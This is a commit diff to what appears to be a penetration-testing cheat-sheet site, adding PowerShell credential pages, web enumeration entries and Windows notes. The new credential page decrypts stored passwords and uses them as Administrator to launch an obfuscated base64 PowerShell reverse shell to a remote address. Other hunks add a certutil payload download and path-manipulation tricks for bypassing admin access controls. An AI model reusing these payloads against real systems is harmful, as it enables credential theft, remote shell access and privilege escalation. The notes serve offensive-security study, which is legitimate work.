add PowerShell crypto

src/exploit/cryptography/algorithm/aes.md

@@ -48,35 +48,6 @@ openssl aes-256-cbc -e -in message.txt -out encrypted_message
 openssl aes-256-cbc -pbkdf2 -iter 10000 -e -in message.txt -out encrypted_message
 ```
 
-### PowerShell
-
-Reference: https://learn.microsoft.com/ja-jp/powershell/module/microsoft.powershell.security/convertto-securestring?view=powershell-7.3
-
-```powershell
-# Generate a secure string (input a plain text in prompt)
-$secure = Read-Host -AsSecureString
-
-# Store a key
-$key = (1..16)
-
-# Generate an encrypted string from the secure string
-$encrypted = ConvertFrom-SecureString -SecureString $secure
-# using key
-$encrypted = ConvertFrom-SecureString -SecureString $secure -Key $key
-
-echo $encrypted
-
-# Convert an encrypted string to a secure string
-$secure2 = ConvertTo-SecureString -String $encrypted
-# using key
-$secure2 = ConvertTo-SecureString -String $encrypted -Key $key
-
-echo $secure2
-
-# Reveal user password
-$userpass = (New-Object pscredential 0, $encrypted).GetNetworkCredential().Password
-```
-
 <br />
 
 ## Implement AES in Python

src/exploit/cryptography/algorithm/powershell-credentials.md

@@ -0,0 +1,63 @@
+---
+title: PowerShell Credentials
+description: 
+tags:
+    - Cryptography
+refs:
+date: 2024-03-17
+draft: false
+---
+
+## Decrypt
+
+```powershell
+$EncString = "<encrypted string>"
+$SecureString = ConvertTo-SecureString $EncString
+$Credential = New-Object System.Management.Automation.PSCredential -ArgumentList "username",$SecureString
+# Store the decrypted passsword to `$password` variable.
+$password = echo $Credential.GetNetworkCredential().password
+```
+
+### Login with Credential
+
+After decrypting, we can use the credential for login another user with reverse shell.
+
+```powershell
+$username = "Administrator"
+$SecurePassword = ConvertTo-SecureString $password -AsPlainText -Force
+$credential = New-Object System.Management.Automation.PSCredential ($username, $securePassword)
+
+# Invoke reverse shell with credential
+Invoke-Command -ComputerName localhost -Credential $credential -ScriptBlock {powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQAwAC4AMAAxACIALAA0ADQANAA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==}
+```
+
+<br />
+
+## Encrypt
+
+Reference: https://learn.microsoft.com/ja-jp/powershell/module/microsoft.powershell.security/convertto-securestring?view=powershell-7.3
+
+```powershell
+# Generate a secure string (input a plain text in prompt)
+$secure = Read-Host -AsSecureString
+
+# Store a key
+$key = (1..16)
+
+# Generate an encrypted string from the secure string
+$encrypted = ConvertFrom-SecureString -SecureString $secure
+# using key
+$encrypted = ConvertFrom-SecureString -SecureString $secure -Key $key
+
+echo $encrypted
+
+# Convert an encrypted string to a secure string
+$secure2 = ConvertTo-SecureString -String $encrypted
+# using key
+$secure2 = ConvertTo-SecureString -String $encrypted -Key $key
+
+echo $secure2
+
+# Reveal user password
+$userpass = (New-Object pscredential 0, $encrypted).GetNetworkCredential().Password
+```

src/exploit/web/method/web-content-discovery.md

@@ -4,7 +4,7 @@ description: If we want to find hidden directories or files, we can enumerate th
 tags:
     - Web
 refs:
-date: 2024-02-13
+date: 2024-03-17
 draft: false
 ---
 
@@ -80,6 +80,7 @@ project.wsgi
 /example.asp
 /example.aspx
 /example.aspx/trace.axd
+/web.config
 
 # If you know the users manage the website, try the usernames
 /admin

src/exploit/web/method/web-vhost-enumeration.md

@@ -4,7 +4,7 @@ description: We can find virtual hosts for websites by enumerating Host header v
 tags:
     - Web
 refs:
-date: 2023-04-08
+date: 2024-03-17
 draft: false
 ---
 
@@ -22,7 +22,12 @@ ffuf -u http://10.0.0.1/ -H "Host: FUZZ.example.com" -w wordlist.txt -fs 1234
 wfuzz -u http://example.com -H "Host: FUZZ.example.com" -w wordlist.txt --hl 138
 ```
 
-If we found vhosts, add them to the **`/etc/hosts`** in our machine.
+### Add Vhosts to Hosts File
+
+If we found a vhost, add that ip&domain to the hosts file depending on your attack machine.
+
+- Linux: `/etc/hosts`
+- Windows: `C:\Windows\System32\drivers\etc\hosts`
 
 <br />
 

src/exploit/web/security-risk/broken-access-control.md

@@ -4,10 +4,34 @@ description: The attacking methodology of broken access control in web applicati
 tags:
     - Web
 refs:
-date: 2023-11-11
+date: 2024-03-17
 draft: false
 ---
 
+## Manipulate Path
+
+```sh
+/admin
+/Admin
+/ADMIN
+
+/./admin
+/.;/admin
+/;/admin
+/admin/
+/admin/.
+
+/admin%0d
+/admin%0a
+/admin%0d%0a
+
+# Add a tab (or multiple tabs) after the path, not escape characters (`\t`).
+# It's recommended to use BurpSuite Proxy.
+/admin		HTTP/1.1
+```
+
+<br />
+
 ## Change Header Values
 
 ### Cookie

src/exploit/windows/dotnet/_data.yml

@@ -0,0 +1 @@
+category2: dotnet

src/exploit/windows/dotnet/index.md

@@ -0,0 +1,24 @@
+---
+title: .NET
+description: .NET is an application development environment.
+tags:
+    - Windows
+refs:
+date: 2024-03-17
+draft: false
+---
+
+## Create a .NET Project from Command Line
+
+```bash
+# Create a new solution file
+# -n: The name for the output being created
+dotnet new sln -n test
+
+# Create a new .NET project.
+# console: Use a template for creating a console application.
+dotnet new console -n test
+
+# Add the project to a solution file.
+dotnet sln add test/test.csproj
+```

src/exploit/windows/powershell/powershell.md → src/exploit/windows/powershell/index.md

@@ -4,7 +4,7 @@ description: Powershell is a task automation and configuration management progra
 tags:
     - Windows
 refs:
-date: 2023-03-05
+date: 2023-03-17
 draft: false
 ---
 
@@ -97,6 +97,8 @@ Set-Content -Path .\example.txt -Value hello
 
 ```powershell
 Invoke-WebRequest -Uri http://10.0.0.1:8000/example.exe -OutFile .\example.exe
+
+certutil -urlcache -f http://10.0.0.1:8000/example.exe example.exe
 ```
 
 ### Copy Files

src/exploit/windows/protocol/msrpc-pentesting.md

@@ -4,7 +4,7 @@ description: It is also known as a function call or a subroutine call. Default p
 tags:
     - Windows
 refs:
-date: 2024-02-18
+date: 2024-03-17
 draft: false
 ---
 
@@ -23,7 +23,7 @@ impacket-rpcdump -port 135 <target-ip> | grep -E 'MS-EFSRPC|MS-RPRN|MS-PAR'
 ```
 
 - **MS-EFSRPC**: It might be vulnerable to **PetitPotam**.
-- **MS-RPRN**, **MS-PAR**: It might be vulnerable to **PringNightmare**.
+- **MS-RPRN**, **MS-PAR**: It might be vulnerable to **PrintNightmare**.
 
 ### Metasploit